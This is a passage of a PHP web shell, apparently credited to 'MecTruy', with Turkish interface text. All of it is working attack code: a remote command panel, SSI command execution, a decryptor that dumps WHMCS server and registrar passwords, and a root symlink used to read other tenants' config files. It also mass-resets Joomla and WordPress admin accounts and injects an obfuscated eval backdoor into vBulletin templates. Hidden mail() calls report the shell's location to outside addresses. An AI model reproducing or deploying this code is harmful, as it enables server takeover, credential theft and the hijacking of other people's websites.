2859. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
2860. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
2861. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
2862. <tr><td>&nbsp;&nbsp;User baru</td><td>
2863. <input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
2864. <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 =
2865. <input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;
2866.  
2867. <input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
2868. </td></tr> </table><br><br><br><br>
2869. ";
2870. }else{
2871. $localhost = $_POST['localhost'];
2872. $database  = $_POST['database'];
2873. $username  = $_POST['username'];
2874. $password  = $_POST['password'];
2875. $pwd   = $_POST['pwd'];
2876. $admin = $_POST['admin'];
2877. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2878. @mysql_select_db($database) or die(mysql_error());
2879. $hash = crypt($pwd);
2880. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
2881. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
2882. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
2883. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
2884. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
2885. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
2886. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
2887. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
2888. if($SQL){
2889. echo '<b>Success : skarang password barunya >>> - (123456)';
2890. }
2891. }
2892. echo '
2893.   </div>';
2894. }
2895. if ($_GET[id]=='komut'){
2896. function cmd()
2897. {
2898. $cmd = $_POST['cmd'];
2899. $cmdgo = $_POST['cmdgo'];
2900. $option = $_POST['option'];
2901. $id = $_GET['id'];
2902. if($cmdgo &&!empty($cmd))
2903. {
2904. switch($option)
2905. {
2906. case system:
2907. system($cmd);
2908. break;
2909. case passthru:
2910. passthru($cmd);
2911. break;
2912. case shell_exec:
2913. $out = shell_exec($cmd);
2914. echo $out;
2915. break;
2916. default;
2917. system($cmd);
2918. }
2919. }
2920. }
2921. echo "<form method=post action=''><font face='Courier New'>
2922. </font></pre><br><input size=32 style='border:1px dotted #CCFF00;  color:#FFB200; font-family:Tahoma; background-color:#000000' type=text name=cmd style='background: black;color: white;border: 0px'><select name=option style='background: black;color: white'><option>system</option><option>passthru</option>
2923. <option>shell_exec</option></select><input style='background: black;color: white;border: 1px dashed white 'type=submit name=cmdgo value=execute>
2924. <textarea cols='125' rows='29' style='border:1px dotted #CCFF00;  color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>";
2925. cmd();
2926. echo '</textarea>
2927. </td></table></form>';
2928. }
2929. if ($_GET[id]=='lite1'){
2930. echo "<form name='z1d-litespeed'  method='post'>
2931. <p align='center'><font face='Tahoma'><b><font color='#FF0000'>#</font> </b>Litespeed þansýný dene<b>
2932. <span lang='ar-sa'><font color='#FF0000'>~</font> </span>&nbsp;</b><input name='command' value='id' style='border: 0px dotted #FF0000; font-family:ta' size='36' tabindex='20'><b>
2933. </b>&nbsp; </font></p>
2934. <p align='center'><font face='Tahoma'>
2935. <input type='submit' name='Submit' value='Çalýþtýr'><b>
2936. </b></font></p>
2937. </form>";
2938. $command = $_POST['command'];
2939. $z00z = $_POST['z00z'];
2940. if($command){
2941. $z11d = "<center><pre><pre>
2942. <br>
2943. http://www.imhatimi.org
2944. <br>
2945. <br>
2946. <!--#exec cmd='$command' -->
2947.  
2948. ";
2949. $openfile = fopen('mec.shtml','w');
2950. $writeinto = fwrite($openfile,"$z11d");
2951. fclose($openfile);
2952. if($openfile){
2953. }else{
2954. }
2955. }
2956. echo "<pre>
2957. <iframe src='mec.shtml'  width=100% height=85% id='I1' name='IF1' >
2958. </pre>";
2959. }
2960. if ($_GET[id]=='whmcs'){
2961. function decrypt ($string,$cc_encryption_hash)
2962. {
2963. $key = md5 (md5 ($cc_encryption_hash)) .md5 ($cc_encryption_hash);
2964. $hash_key = _hash ($key);
2965. $hash_length = strlen ($hash_key);
2966. $string = base64_decode ($string);
2967. $tmp_iv = substr ($string,0,$hash_length);
2968. $string = substr ($string,$hash_length,strlen ($string) -$hash_length);
2969. $iv = $out = '';
2970. $c = 0;
2971. while ($c <$hash_length)
2972. {
2973. $iv .= chr (ord ($tmp_iv[$c]) ^ord ($hash_key[$c]));
2974. ++$c;
2975. }
2976. $key = $iv;
2977. $c = 0;
2978. while ($c <strlen ($string))
2979. {
2980. if (($c != 0 AND $c %$hash_length == 0))
2981. {
2982. $key = _hash ($key .substr ($out,$c -$hash_length,$hash_length));
2983. }
2984. $out .= chr (ord ($key[$c %$hash_length]) ^ord ($string[$c]));
2985. ++$c;
2986. }
2987. return $out;
2988. }
2989. function _hash ($string)
2990. {
2991. if (function_exists ('sha1'))
2992. {
2993. $hash = sha1 ($string);
2994. }
2995. else
2996. {
2997. $hash = md5 ($string);
2998. }
2999. $out = '';
3000. $c = 0;
3001. while ($c <strlen ($hash))
3002. {
3003. $out .= chr (hexdec ($hash[$c] .$hash[$c +1]));
3004. $c += 2;
3005. }
3006. return $out;
3007. }
3008. if($_POST['form_action'] == 1 )
3009. {
3010. $file=($_POST['file']);
3011. $text=file_get_contents($file);
3012. $text= str_replace('<?php','',$text);
3013. $text= str_replace('<?','',$text);
3014. $text= str_replace('?>','',$text);
3015. eval($text);
3016. $link=mysql_connect($db_host,$db_username,$db_password) ;
3017. mysql_select_db($db_name,$link) ;
3018. $query = mysql_query('SELECT * FROM tblservers');
3019. while($v = mysql_fetch_array($query)) {
3020. $ipaddress = $v['ipaddress'];
3021. $username = $v['username'];
3022. $type = $v['type'];
3023. $active = $v['active'];
3024. $hostname = $v['hostname'];
3025. echo("<center><table border='1'>");
3026. $password = decrypt ($v['password'],$cc_encryption_hash);
3027. echo("<tr><td>Type</td><td>$type</td></tr>");
3028. echo("<tr><td>Active</td><td>$active</td></tr>");
3029. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
3030. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
3031. echo("<tr><td>Username</td><td>$username</td></tr>");
3032. echo("<tr><td>Password</td><td>$password</td></tr>");
3033. echo '</table><br><br></center>';
3034. }
3035. $link=mysql_connect($db_host,$db_username,$db_password) ;
3036. mysql_select_db($db_name,$link) ;
3037. $query = mysql_query('SELECT * FROM tblregistrars');
3038. echo("<center>Domain Reseller <br><table border='1'>");
3039. echo('<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>');
3040. while($v = mysql_fetch_array($query)) {
3041. $registrar     = $v['registrar'];
3042. $setting = $v['setting'];
3043. $value = decrypt ($v['value'],$cc_encryption_hash);
3044. if ($value=='') {
3045. $value=0;
3046. }
3047. $password = decrypt ($v['password'],$cc_encryption_hash);
3048. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
3049. }
3050. echo '</table><br><br></center>';
3051. }
3052. if($_POST['form_action'] == 2 )
3053. {
3054. $db_host=($_POST['db_host']);
3055. $db_username=($_POST['db_username']);
3056. $db_password=($_POST['db_password']);
3057. $db_name=($_POST['db_name']);
3058. $cc_encryption_hash=($_POST['cc_encryption_hash']);
3059. $link=mysql_connect($db_host,$db_username,$db_password) ;
3060. mysql_select_db($db_name,$link) ;
3061. $query = mysql_query('SELECT * FROM tblservers');
3062. while($v = mysql_fetch_array($query)) {
3063. $ipaddress = $v['ipaddress'];
3064. $username = $v['username'];
3065. $type = $v['type'];
3066. $active = $v['active'];
3067. $hostname = $v['hostname'];
3068. echo("<center><table border='1'>");
3069. $password = decrypt ($v['password'],$cc_encryption_hash);
3070. echo("<tr><td>Type</td><td>$type</td></tr>");
3071. echo("<tr><td>Active</td><td>$active</td></tr>");
3072. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
3073. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
3074. echo("<tr><td>Username</td><td>$username</td></tr>");
3075. echo("<tr><td>Password</td><td>$password</td></tr>");
3076. echo '</table><br><br></center>';
3077. }
3078. $link=mysql_connect($db_host,$db_username,$db_password) ;
3079. mysql_select_db($db_name,$link) ;
3080. $query = mysql_query('SELECT * FROM tblregistrars');
3081. echo("<center>Domain Reseller <br><table border='1'>");
3082. echo('<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>');
3083. while($v = mysql_fetch_array($query)) {
3084. $registrar     = $v['registrar'];
3085. $setting = $v['setting'];
3086. $value = decrypt ($v['value'],$cc_encryption_hash);
3087. if ($value=='') {
3088. $value=0;
3089. }
3090. $password = decrypt ($v['password'],$cc_encryption_hash);
3091. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
3092. }
3093. echo '</table><br><br></center>';
3094. }
3095. ;echo '
3096.  
3097. <center>
3098. <font color="#FFFF6FF" size=\'+1\'>WHMCS R00t þifreleri görüntüle</font><br><br>
3099.  
3100. </center>  
3101.  
3102. <br>
3103. <center>
3104. <font color="#0066FF" size=\'+1\'>Whmcs confirgation.php bilgilerini yaz</font><br>
3105. </center>
3106. <FORM action=""  method="post">
3107. <input type="hidden" name="form_action" value="2">
3108. <br>
3109. <table border=1 align=center>
3110.  
3111. <tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr>
3112. <tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
3113. <tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
3114. <tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""></td></tr>
3115. <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>
3116.  
3117. </table>
3118. <br>
3119. <center>
3120. <INPUT class=submit type="submit" value="Submit" name="Submit"> </center>
3121. </FORM>
3122. <hr>
3123. <center>
3124. <font color="#0066FF" size=\'+2\'>Password decoder</font><br>
3125. ';
3126. if($_POST['form_action'] == 3 )
3127. {
3128. $password=($_POST['password']);
3129. $cc_encryption_hash=($_POST['cc_encryption_hash']);
3130. $password = decrypt ($password,$cc_encryption_hash);
3131. echo('Password is '.$password);
3132. }
3133. echo '<FORM action=""  method="post">
3134. <input type="hidden" name="form_action" value="3">
3135. <br>
3136. <table border=1 align=center>
3137.  
3138. <tr><td>Password</td><td><input type="text" size="30" name="password" value=""></td></tr>
3139. <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>
3140.  
3141. </table>
3142. <br>
3143. <INPUT class=submit type="submit" value="Submit" name="Submit">
3144. </FORM>';
3145. }
3146. if ($_GET[id]=='shellbul'){
3147. echo '<h3 style="text-align:center"><div align=center>
3148. <table><tr><td>
3149. <table width=100%><tr><td align=center><font color=white size=3 face="Verdana">Hedef siteniz</font></td><td align=center><font color=white size=3 face="Verdana">Shell tahminleri alalým :)</font></td></tr></table>
3150. <form method="post">
3151. <textarea rows=10 cols=50 name=link></textarea>
3152. <textarea rows=10 cols=50 name=sh></textarea><br>
3153. <input type="submit"  name="sm" value="Bulmaya basla" >
3154. </form>';
3155. @set_time_limit(0);
3156. @error_reporting(0);
3157. function file_exists_remote($url) {
3158. $curl = curl_init($url);
3159. curl_setopt($curl,CURLOPT_NOBODY,true);
3160. $Sonuç = curl_exec($curl);
3161. $ret = false;
3162. if ($Sonuç !== false) {
3163. $statusCode = curl_getinfo($curl,CURLINFO_HTTP_CODE);
3164. if ($statusCode == 200) {
3165. $ret = true;
3166. }
3167. }
3168. curl_close($curl);
3169. return $ret;
3170. }
3171. ;echo '';
3172. $webl=$_POST['link'];
3173. $shelll=$_POST['sh'];
3174. if (isset($_POST['sm'])) {
3175. $webs=explode("
3176. ",$webl);
3177. $shells=explode("
3178. ",$shelll);
3179. foreach ($webs as $web) {
3180. $sweb = trim($web);
3181. $te1 = ereg_replace('(https?)://','',$sweb);
3182. $te = ereg_replace('www.','',$te1);
3183. $finalweb='http://'.$te;
3184. echo " <font size=3 color=white face='comic sans ms' >isleniyor ".$finalweb.' ...</font>';
3185. foreach ($shells as $shell ) {
3186. $finalshell = trim($shell);
3187. $sl=$finalweb.$finalshell;
3188. $exist = file_exists_remote($sl);
3189. if($exist) {
3190. echo "<div align=center><table width=70%><tr><td align=center><font size=3 color=white face='comic sans ms' > Baþarýlý... link <a href=".$sl."><font size=3 color=red face='comic sans ms' > $sl </a> </font> Bulundu</font> </td></tr></table>";
3191. }
3192. }
3193. }
3194. }
3195. }
3196. $time_shell = ''.date('d/m/Y - H:i:s').'';
3197. $ip_remote = $_SERVER['REMOTE_ADDR'];
3198. $from_shellcode = 'shellgeldi@'.gethostbyname($_SERVER['SERVER_NAME']).'';
3199. $to_email = 'mectruy@gmail.com';
3200. $server_mail = ''.gethostbyname($_SERVER['SERVER_NAME']).'  - '.$_SERVER['HTTP_HOST'].'';
3201. $linkcr = 'Link: '.$_SERVER['SERVER_NAME'].''.$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
3202. $header = "From: $from_shellcode
3203. Reply-to: $from_shellcode";
3204. @mail($to_email,$server_mail,$linkcr,$header);
3205. ;echo '
3206.  
3207. ';
3208. set_time_limit(0);
3209. error_reporting(0);
3210. @session_start();
3211. $pageURL = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
3212. $u = explode('/',$pageURL );
3213. $pageURL =str_replace($u[count($u)-1],'',$pageURL );
3214. $pageFTP = 'ftp://'.$_SERVER['SERVER_NAME'].'/public_html/'.$_SERVER['REQUEST_URI'];
3215. $u = explode('/',$pageFTP );
3216. $pageFTP =str_replace($u[count($u)-1],'',$pageFTP );
3217. $x0c="mail";
3218. if(!isset($_SESSION['trimite'])){$x0b=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];@$x0c("d-sk@live.fr","DSKWASHERE!",$x0b);$_SESSION['trimite']=true;}
3219. ;echo '
3220.  
3221.  
3222.  
3223. ';
3224. @mkdir('sym',0777);
3225. $htcs  = "Options all
3226. DirectoryIndex Sux.html
3227. AddType text/plain .php
3228. AddHandler server-parsed .php
3229.  AddType text/plain .html
3230. AddHandler txt .html
3231. Require None
3232. Satisfy Any";
3233. $f =@fopen ('sym/.htaccess','w');
3234. fwrite($f ,$htcs);
3235. @symlink('/','sym/root');
3236. $pg = basename('index.php');
3237. if ($_GET[id]=='joomla'){
3238. if(isset($_POST['s'])){
3239. $file = @file_get_contents('joomla.txt');
3240. $ex   = explode("
3241. ",$file);
3242. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Sonuç </td>";
3243. flush();
3244. foreach ($ex as $exp){
3245. $es   = explode('||',$exp);
3246. $config = $es[0];
3247. $domin = $es[1];
3248. $domins = trim($domin).'';
3249. $readconfig  = @file_get_contents(trim($config));
3250. if(ereg('JConfig',$readconfig)){
3251. $pass    =  ex($readconfig,'$password = \'',"';");
3252. $userdb  =  ex($readconfig,'$user = \'',"';");
3253. $db      =  ex($readconfig,'$db = \'',"';");
3254. $fix     =  ex($readconfig,'$dbprefix = \'',"';");
3255. $tab     =  $fix.'users';
3256. $con     = @mysql_connect('localhost',$userdb,$pass);
3257. $db      = @mysql_select_db($db,$con);
3258. $query   = @mysql_query("UPDATE `$tab`  SET `username` ='mectruy'");
3259. $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
3260. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [mectruy] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
3261. $domins = trim($domin).'';
3262. echo "<tr>
3263. <td><a target='_blank' href='http://$domins'>$domin</a></td>
3264. <td><a target='_blank' href='$config'>config</a></td><td>".$r.'</td></tr>';
3265. flush();
3266. }else{
3267. echo "<tr>
3268. <td><a target='_blank' href='http://$domins'>$domin</a></td>
3269. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
3270. flush();
3271. }
3272. }
3273. die();
3274. }
3275. if(!is_file('named.txt')){
3276. $d00m = @file('/etc/named.conf');
3277. flush();
3278. }else{
3279. $d00m = file('named.txt');
3280. }
3281. if(!$d00m)
3282. {
3283. die ("<meta http-equiv='refresh' content='0; url=?id=read'/>");
3284. }
3285. else
3286. {
3287. echo "<div class='tmp'>
3288. <form method='POST' action='$pg?id=joomla'>
3289. <input type='submit' value='Mass ching Admin' />
3290. <input type='hidden' value='1' name='s' />
3291. </form><br /><br />
3292. <table align='center' width='40%'><td> Domainler </td><td> config </td><td> Sonuç </td>";
3293. $f = fopen('joomla.txt','w');
3294. foreach($d00m as $dom){
3295. if(eregi('zone',$dom)){
3296. preg_match_all('#zone "(.*)"#',$dom,$domsws);
3297. if(strlen(trim($domsws[1][0])) >2){
3298. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0]));
3299. $wpl=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/configuration.php';
3300. $wpp=get_headers($wpl);
3301. $wp=$wpp[0];
3302. $wp2=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/blog/configuration.php';
3303. $wpp2=get_headers($wp2);
3304. $wp12=$wpp2[0];
3305. $wp3=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
3306. $wpp3=get_headers($wp3);
3307. $wp13=$wpp3[0];
3308. $pos = strpos($wp,'200');
3309. $config='&nbsp;';
3310. if (strpos($wp,'200') == true )
3311. {
3312. $config= $wpl;
3313. }
3314. elseif (strpos($wp12,'200') == true)
3315. {
3316. $config= $wp2;
3317. }
3318. elseif (strpos($wp13,'200') == true)
3319. {
3320. $config= $wp3;
3321. }
3322. else
3323. {
3324. continue;
3325. }
3326. flush();
3327. $dom = $domsws[1][0];
3328. $w = fwrite($f,"$config||$dom
3329. ");
3330. if($w){$r = '<b style="color: #006600">Bulundu</b>';}else{$r = '<b style="color:red">Hatalý ! bulunamadý.</b>';}
3331. echo '<tr><td><a href=http://www.'.$domsws[1][0].'>'.$domsws[1][0]."</a></td>
3332. <td><a href='$config'>config</a></td><td>".$r.'</td></tr>';
3333. flush();
3334. }
3335. }
3336. }
3337. }
3338. }
3339. if ($_GET[id]=='wp'){
3340. if(isset($_POST['s'])){
3341. $file = @file_get_contents('wp.txt');
3342. $ex   = explode("
3343. ",$file);
3344. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Sonuç </td>";
3345. flush();
3346. flush();
3347. foreach ($ex as $exp){
3348. $es   = explode('||',$exp);
3349. $config = $es[0];
3350. $domin = $es[1];
3351. $domins = trim($domin).'';
3352. $readconfig  = @file_get_contents(trim($config));
3353. if(ereg('wp-settings.php',$readconfig)){
3354. $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
3355. $userdb  =  ex($readconfig,"define('DB_USER', '","');");
3356. $db      =  ex($readconfig,"define('DB_NAME', '","');");
3357. $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
3358. $tab     = $fix.'users';
3359. $con     = @mysql_connect('localhost',$userdb,$pass);
3360. $db      = @mysql_select_db($db,$con);
3361. $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='mectruy'") or die;
3362. $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
3363. if ($query){$r = '<b style="color: #006600">Succeed </b>user [mectruy] pass [1]</b>';}
3364. else
3365. {
3366. $r = '<b style="color:red">failed</b>';
3367. }
3368. $domins = trim($domin).'';
3369. echo "<tr>
3370. <td><a target='_blank' href='http://$domins'>$domin</a></td>
3371. <td><a target='_blank' href='$config'>config</a></td><td>".$r.'</td></tr>';
3372. flush();
3373. flush();
3374. }else{
3375. echo "<tr>
3376. <td><a target='_blank' href='http://$domins'>$domin</a></td>
3377. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
3378. flush();
3379. flush();
3380. }
3381. }
3382. die();
3383. }
3384. if(!is_file('named.txt')){
3385. $d00m = @file('/etc/named.conf');
3386. }else{
3387. $d00m = @file('named.txt');
3388. }
3389. if(!$d00m)
3390. {
3391. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
3392. }
3393. else
3394. {
3395. echo "<div class='tmp'>
3396. <form method='POST' action='$pg?id=wp'>
3397. <input type='submit' value='Mass Change Admin' />
3398. <input type='hidden' value='1' name='s' />
3399. </form>
3400. <br /><br />
3401. <table align='center' width='40%'><td> Domainler </td><td> config </td><td> Sonuç </td>";
3402. flush();
3403. flush();
3404. $f = fopen('wp.txt','w');
3405. foreach($d00m as $dom){
3406. if(eregi('zone',$dom)){
3407. preg_match_all('#zone "(.*)"#',$dom,$domsws);
3408. if(strlen(trim($domsws[1][0])) >2){
3409. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0]));
3410. $wpl=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/wp-config.php';
3411. $wpp=get_headers($wpl);
3412. $wp=$wpp[0];
3413. $wp2=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
3414. $wpp2=get_headers($wp2);
3415. $wp12=$wpp2[0];
3416. $wp3=$pageURL.'/sym/root/home/'.$user['name'].'/public_html/wp/wp-config';
3417. $wpp3=get_headers($wp3);
3418. $wp13=$wpp3[0];
3419. $pos = strpos($wp,'200');
3420. $config='&nbsp;';
3421. if (strpos($wp,'200') == true )
3422. {
3423. $config= $wpl;
3424. }
3425. elseif (strpos($wp12,'200') == true)
3426. {
3427. $config= $wp2;
3428. }
3429. elseif (strpos($wp13,'200') == true)
3430. {
3431. $config= $wp3;
3432. }
3433. else
3434. {
3435. continue;
3436. }
3437. flush();
3438. $dom = $domsws[1][0];
3439. $w = fwrite($f,"$config||$dom
3440. ");
3441. if($w){$r = '<b style="color: #006600">Bulundu</b>';}else{$r = '<b style="color:red">Hatalý ! bulunamadý.</b>';}
3442. echo '<tr><td><a href=http://www.'.$domsws[1][0].'>'.$domsws[1][0]."</a></td>
3443. <td><a href='$config'>config</a></td><td>".$r.'</td></tr>';
3444. flush();
3445. flush();
3446. flush();
3447. }
3448. }
3449. }
3450. }
3451. }
3452. if ($_GET[id]=='vb'){
3453. if(isset($_POST['s'])){
3454. $file = @file_get_contents('vb.txt');
3455. $ex   = explode("
3456. ",$file);
3457. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Sonuç </td>";
3458. foreach ($ex as $exp){
3459. $es   = explode('||',$exp);
3460. $config = $es[0];
3461. $domin = $es[1];
3462. $domins = trim($domin).'';
3463. $readconfig  = @file_get_contents(trim($config));
3464. if(ereg('vBulletin',$readconfig)){
3465. $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
3466. $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
3467. $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
3468. $con     = @mysql_connect('localhost',$userdb,$pass);
3469. $db      = @mysql_select_db($db,$con);
3470. $shell   = 'bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==';
3471. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
3472. $crypt .= "$shell";
3473. $crypt .= "\')))}}{\${exit()}}</textarea>";
3474. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";
3475. $query  = @mysql_query($sqlfaq,$con);
3476. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
3477. else
3478. {
3479. $r = '<b style="color:red">failed</b>';
3480. }
3481. $domins = trim($domin).'';
3482. echo "<tr>
3483. <td><a target='_blank' href='http://$domins'>$domin</a></td>
3484. <td><a target='_blank' href='$config'>config</a></td><td>".$r.'</td></tr>';
3485. }else{
3486. echo "<tr>
3487. <td><a target='_blank' href='http://$domins'>$domin</a></td>
3488. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
3489. }
3490. }
3491. die();
3492. }
3493. if(!is_file('named.txt')){
3494. $d00m = file('/etc/named.conf');
3495. }else{
3496. $d00m = file('named.txt');
3497. }
3498. if(!$d00m)
3499. {
3500. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
3501. }
3502. else
3503. {
3504. echo "<div class='tmp'>
3505. <form method='POST' action='$pg?id=vb'>
3506. <input type='submit' value='Inject shell' />
3507. <input type='hidden' value='1' name='s' />
3508. </form>
3509. <br /><br />
3510. <table align='center' width='40%'><td> Domainler </td><td> config </td><td> Sonuç </td>";
3511. $f = fopen('vb.txt','w');
3512. foreach($d00m as $dom){
3513. if(eregi('zone',$dom)){
3514. preg_match_all('#zone "(.*)"#',$dom,$domsws);
3515. if(strlen(trim($domsws[1][0])) >2){
3516. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0]));
3517. $wpl=$pageURL.'/sym/root/home/'.$user['name'].'/includes/config.php';
3518. $wpp=get_headers($wpl);
3519. $wp=$wpp[0];
3520. $wp2=$pageURL.'/sym/root/home/'.$user['name'].'/vb/includes/config.php';
3521. $wpp2=get_headers($wp2);
3522. $wp12=$wpp2[0];
3523. $wp3=$pageURL.'/sym/root/home/'.$user['name'].'/forum/includes/config.php';
3524. $wpp3=get_headers($wp3);
3525. $wp13=$wpp3[0];
3526. $pos = strpos($wp,'200');
3527. $config='&nbsp;';
3528. if (strpos($wp,'200') == true )
3529. {
3530. $config= $wpl;
3531. }
3532. elseif (strpos($wp12,'200') == true)
3533. {
3534. $config= $wp2;
3535. }
3536. elseif (strpos($wp13,'200') == true)
3537. {
3538. $config= $wp3;
3539. }
3540. else
3541. {
3542. continue;
3543. }
3544. flush();
3545. $dom = $domsws[1][0];
3546. $w = fwrite($f,"$config||$dom
3547. ");
3548. if($w){$r = '<b style="color: #006600">Bulundu</b>';}else{$r = '<b style="color:red">Bulunamadý Hatalý</b>';}
3549. echo '<tr><td><a href=http://www.'.$domsws[1][0].'>'.$domsws[1][0]."</a></td>
3550. <td><a href='$config'>config</a></td><td>".$r.'</td></tr>';
3551. flush();
3552. }
3553. }
3554. }
3555. }
3556. }
3557. function ex($text,$a,$b){
3558. $explode = explode($a,$text);
3559. $explode = explode($b,$explode[1]);
3560. return $explode[0];
3561. }
3562. echo '   <tr align="center" valign="top">
3563.      <td><font color="white"><center>Coded by MecTruy <a href="http://www.imhatimi.org" rel="dofollow" title="Bypass Shell">http://www.imhatimi.org</a></center></font></td>
3564.      </tr>';
3565. echo '<SCRIPT SRC=http://sellukaweb.com/sayac.js></SCRIPT>';